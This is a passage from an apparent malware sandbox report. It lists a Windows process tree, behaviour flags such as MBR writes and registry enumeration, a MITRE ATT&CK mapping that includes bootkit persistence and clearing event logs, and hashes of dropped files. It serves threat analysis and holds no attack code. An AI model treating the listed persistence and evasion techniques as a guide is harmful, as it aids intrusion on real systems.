C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:3328
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4984
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 7236416439c5a9beb745f68b1b2f7188 74SyLuGg+E29IJf+xVLeUg.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:4488 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1684
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2408
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1976
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2068
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:2684
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3948
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5b5f6c9ac3389f5e61b4c750cf950e27c
SHA1dbe0cca47ab36938ed022311f97736fc2915ff06
SHA256bd4062e261a7ac5893e95a88d79564b44aad58ca446c3649a50589415b64d098
SHA512014f187b94012f0a5077908107a7b0f3c7efae9edf1a6ea7c395e387830e2fe84105a12ea8446311e0fc25fbe2790f56b614c9726507a22fee7baa46b2c4487c
-
Filesize
85KB
MD56435792d63be630506eb9eebbd1e3878
SHA137f7023b735b3f8cd65803bc704ad529f896ff4a
SHA256dc4f64ba228c5d301a8d64bd8c172b45779583375d3c1be3c83c3cd1c7d2a5e3
SHA51288af5a007d8d21b057740f42ebea3c4fe529924637b2c6b027ed520905ee8445f6b70d7a069457f82134e2c4405b0641f7620adccd8abb1c2ca1dd62cd127955
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD583685d101174171875b4a603a6c2a35c
SHA137be24f7c4525e17fa18dbd004186be3a9209017
SHA2560c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5
-
Filesize
944B
MD5cf79136142125a14a0d763b303b2effd
SHA120c496b9c84ddb9c365d6c59823660768c9dfdf7
SHA25638297561076f05a1d94b8c6273098acc6866a563466e6a62e1c75846210715e3
SHA51237e871507b221658b17bc7b1e100a695ed2ddcd5fa39176dc0ee858c7ef78d279699cd493532e1c95774f3b8a869d6a1d8fa3096314ba17025ec0041e2033522
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize290B
MD557b35e5af8da8f7760cf7c70fa2d1a3b
SHA1b5ea79f2518973602be8b6feae68056f0c5700cc
SHA2569e0b0c2cfc2115523e03ef4c17819786d8bf577e7f4ca79d8cb3c01c25aa5b36
SHA51238973006093a0dcf8e269337ef00ab82cf0626e5cf624aaebea5af4bf1b7a2aae87251fd979788579fb9c72b03eae158ca5f12b4f4614000d30e3103dbd758ef
-
Filesize
145B
MD58c317368986510961315209e262814ba
SHA1208c2cf195e5ce173993c7074227a624da002c4b
SHA2565c2c74ef003204c3c7d2b170425b8fa0c2f61fb78708d2ea8f47aed03db056c6
SHA512c1c03c382b1a1310bfd2d5f64f7478d59eb781bd66b74e8466812722910226fbe8f3ccc6e5ca5ff0f8712ff96672e0b2b9a9db59e9df705721880f4b11bcbbf8
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD5c5798fe28576e3869ed7ce072cfc503d
SHA1b3530eadff344768e719c55edf11f38c7c8ff6c9
SHA25677d2a5d2517778e4bb176d7c347582e70abc0e7a852b3c9f91480e870bf01d75
SHA51264663bb398e838bf511adc9675fbb2a3f5c0c9996a654b99eb30d57887e8fbff5608e44d6391eaad67133ec4a9fd46781b69a81fc9fff7198a15b86db75098b6
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD542832ec0b75b76a077c604f931f5c1ad
SHA11a913447077e53e47a1e32a18cb13d2d73784970
SHA256746d0f3ea613a2131cf5ffbd6a941b3aed77c1e4804e4ccf7106ec072bd640b2
SHA512fe203f3de8f2d0c8d0f27ff21a0a98b87b049baf7693296d72df29ec98c6a364caff8ba3f8cd17833323bc09ae72d995b6153cc1e0d65c3ac8f3d8ea76968ffc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
Filesize420B
MD51f13ad5be0fac35d83ee80c8c75ffd04
SHA1240b7dae3a2dc8d5b0d098500aea0fb7c80170f9
SHA25695dab46ebada30571d323a6d44649e59db446a2b8a0b6c3ddb697bceb9e50965
SHA51251ea8f4525378309ca759cc9b1c29f6a50ec81257f7c62b91d701a260fef118128a7bf916a562985922db8c9b2b04fa31561039de3f8c17ce8bb8d21430b389a